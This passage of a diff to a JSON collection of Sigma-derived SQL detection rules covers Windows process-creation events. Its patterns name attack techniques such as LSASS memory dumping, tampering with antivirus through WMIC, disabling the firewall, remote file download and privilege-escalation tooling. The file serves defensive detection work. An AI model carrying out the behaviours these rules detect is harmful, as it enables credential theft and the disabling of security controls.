'% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'High' AND CommandLine LIKE '%conhost.exe%' ESCAPE '\\' AND CommandLine LIKE '%0xffffffff%' ESCAPE '\\' AND CommandLine LIKE '%-ForceV1%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_pua_seatbelt.yml" + "filename": "proc_creation_win_conhost_legacy_option.yml" }, { - "title": "Persistence Via TypedPaths - CommandLine", - "id": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "title": "Stop Windows Service Via PowerShell Stop-Service", + "id": "c49c5062-0966-4170-9efd-9968c913a6cf", "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the stopping of a Windows service", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND CommandLine LIKE '%Stop-Service %' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_typed_paths_persistence.yml" + "filename": "proc_creation_win_powershell_stop_service.yml" }, { - "title": "DLL Sideloading by VMware Xfer Utility", - "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "title": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE", + "id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", "status": "experimental", - "description": "Detects execution of VMware 
Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", + "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002" ], "falsepositives": [ - "Unlikely" + "Inventory tool runs", + "Administrative activity" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((((CommandLine LIKE '% group %' ESCAPE '\\' OR CommandLine LIKE '% localgroup %' ESCAPE '\\') AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\' OR CommandLine LIKE '% /do%' ESCAPE '\\')) AND NOT (CommandLine LIKE '% /add%' ESCAPE '\\')) OR (CommandLine LIKE '% accounts %' ESCAPE '\\' AND CommandLine LIKE '% /do%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_net_groups_and_accounts_recon.yml" + }, + { + "title": "Suspicious PowerShell Child Processes", + "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", + "status": "experimental", + "description": "Detects suspicious child processes spawned by PowerShell", + "author": "Florian Roth (Nextron Systems), Tim Shelton", + "falsepositives": [ + 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + "filename": "proc_creation_win_powershell_susp_child_processes.yml" }, { - "title": "Netsh Allow Group Policy on Microsoft Defender Firewall", - "id": "347906f3-e207-4d18-ae5b-a9403d6bcdef", + "title": "Fake Instance Of Hxtsr.exe", + "id": "4e762605-34a8-406d-b72e-c1a089313320", "status": "test", - "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", - "author": "frack113", + "description": "HxTsr.exe is a Microsoft compressed executable file called 
Microsoft Outlook Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nIts path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe\n", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1036" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%group=%' ESCAPE '\\' AND CommandLine LIKE '%new%' ESCAPE '\\' AND CommandLine LIKE '%enable=Yes%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image = 'hxtsr.exe' AND NOT (CurrentDirectory LIKE 'C:\\\\program files\\\\windowsapps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND CurrentDirectory LIKE '%\\\\hxtsr.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml" + "filename": "proc_creation_win_hxtsr_masquerading.yml" }, { - "title": "Greedy File Deletion Using Del", - "id": "204b17ae-4007-471b-917b-b917b315c5db", + "title": "Remote File Download via Desktopimgdownldr Utility", + "id": "214641c2-c579-4ecb-8427-0cf19df6842e", "status": "experimental", - "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. 
This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", - "author": "frack113", + "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\\\*.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\*.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND CommandLine LIKE '%/lockscreenurl:http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_del_greedy_deletion.yml" + "filename": "proc_creation_win_desktopimgdownldr_remote_file_download.yml" }, { - "title": "HackTool - Dumpert Process Dumper Execution", - "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", - "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "title": "HackTool - SysmonEOP Execution", + "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "status": "experimental", + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" ], "falsepositives": [ - "Very 
unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" ], - "filename": "proc_creation_win_hktl_dumpert.yml" + "filename": "proc_creation_win_hktl_sysmoneop.yml" }, { - "title": "Suspicious Execution of Systeminfo", - "id": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", - "status": "experimental", - "description": "Detects usage of the \"systeminfo\" command to retrieve information", - "author": "frack113", + "title": "Potential Dtrack RAT Activity", + "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "status": "stable", + "description": "Detects potential Dtrack RAT activity via specific process patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR OriginalFileName = 'sysinfo.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND 
CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_systeminfo_execution.yml" + "filename": "proc_creation_win_malware_dtrack.yml" }, { - "title": "Suspicious Execution of Hostname", - "id": "7be5fb68-f9ef-476d-8b51-0256ebece19e", - "status": "test", - "description": "Use of hostname to get information", + "title": "Suspicious Powercfg Execution To Change Lock Screen Timeout", + "id": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", + "status": "experimental", + "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\HOSTNAME.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\powercfg.exe' ESCAPE '\\' OR OriginalFileName = 'PowerCfg.exe') AND ((CommandLine LIKE '%/setacvalueindex %' ESCAPE '\\' AND CommandLine LIKE '%SCHEME\\_CURRENT%' ESCAPE '\\' AND CommandLine LIKE '%SUB\\_VIDEO%' ESCAPE '\\' AND CommandLine LIKE '%VIDEOCONLOCK%' ESCAPE '\\') OR (CommandLine LIKE '%-change %' ESCAPE '\\' AND CommandLine LIKE '%-standby-timeout-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hostname_execution.yml" + "filename": "proc_creation_win_powercfg_execution.yml" }, { - "title": "Suspicious MSHTA Child Process", - "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", - "status": "test", - "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", - "author": "Michael Haag", + "title": "Copy From VolumeShadowCopy Via Cmd.EXE", + "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", + "status": "experimental", + "description": "Detects the 
execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005", - "car.2013-02-003", - "car.2013-03-001", - "car.2014-04-003" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Printer software / driver installations", - "HP software" + "Backup scenarios using the commandline" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_child_processes.yml" + "filename": "proc_creation_win_cmd_shadowcopy_access.yml" }, { - "title": "Possible Shim Database Persistence via sdbinst.exe", - "id": "517490a7-115a-48c6-8862-1a481504d5a8", - "status": "test", - "description": "Detects installation of a new shim using sdbinst.exe. 
A shim can be used to load malicious DLLs into applications.", - "author": "Markus Neis", + "title": "Suspicious Schtasks Execution AppData Folder", + "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "status": "experimental", + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", "tags": [ + "attack.execution", "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdbinst_shim_persistence.yml" + "filename": "proc_creation_win_schtasks_appdata_local_system.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip", - "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", + "title": "Suspicious WmiPrvSE Child Process", + "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "status": "test", - "description": "Detects Obfuscated Powershell via use Clip.exe in 
Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects suspicious and uncommon child processes of WmiPrvSE", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\')))) AND NOT ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE 
'\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" }, { - "title": "Process Memory Dump Via Dotnet-Dump", - "id": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", + "title": "Windows Firewall Disabled via PowerShell", + "id": "12f6b752-042d-483e-bf9c-915a6d06ad75", "status": "experimental", - "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects attempts to disable the Windows Firewall using PowerShell", + "author": "Tim Rauch", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562" ], "falsepositives": [ - "Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dotnet-dump.exe' ESCAPE '\\' OR OriginalFileName = 'dotnet-dump.dll') AND CommandLine LIKE '%collect%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND CommandLine LIKE '% -Enabled %' ESCAPE '\\' AND CommandLine LIKE '% False%' ESCAPE '\\') AND (CommandLine LIKE '% -All %' ESCAPE '\\' OR CommandLine LIKE '%Public%' ESCAPE '\\' OR CommandLine LIKE '%Domain%' ESCAPE '\\' OR CommandLine LIKE '%Private%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dotnet_dump.yml" + 
"filename": "proc_creation_win_powershell_disable_firewall.yml" }, { - "title": "Potential Tampering With Security Products Via WMIC", - "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", - "status": "test", - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Elevated System Shell", + "id": "178e615d-e666-498b-9630-9ed363038101", + "status": "experimental", + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "author": "frack113, Tim Shelton (update fp)", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR 
CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND LogonId = '0x3e7')) 
